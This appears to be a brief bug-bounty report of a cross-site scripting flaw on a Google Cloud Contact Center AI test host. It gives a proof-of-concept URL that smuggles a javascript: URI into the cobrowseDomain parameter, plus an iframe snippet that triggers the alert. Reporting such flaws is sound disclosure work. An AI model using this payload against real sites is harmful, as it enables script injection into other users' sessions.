Summary:
XSS on
https://security-test-ari76op.uc1.ccaiplatform.com
Product:
Google Cloud
URL:
https://security-test-ari76op.uc1.ccaiplatform.com/agent/?type=popup&popup=cobrowse&cobrowseDomain=javascript:alert(window.origin);%2F%2F
Vulnerability type:
Cross-site scripting (XSS)
Details
let f = document.createElement('iframe');
f.hidden = true;
f.src = 'https://security-test-ari76op.uc1.ccaiplatform.com/agent/?type=popup&popup=cobrowse&cobrowseDomain=javascript:alert(window.origin);%2F%2F';
document.body.appendChild(f);
Wait a "small" amount of time for alert to happen.
Attack scenario
Any website can get XSS on Contact Center AI.
(I dont know much about it not created an account yet)
Found as part of grant issue 258419050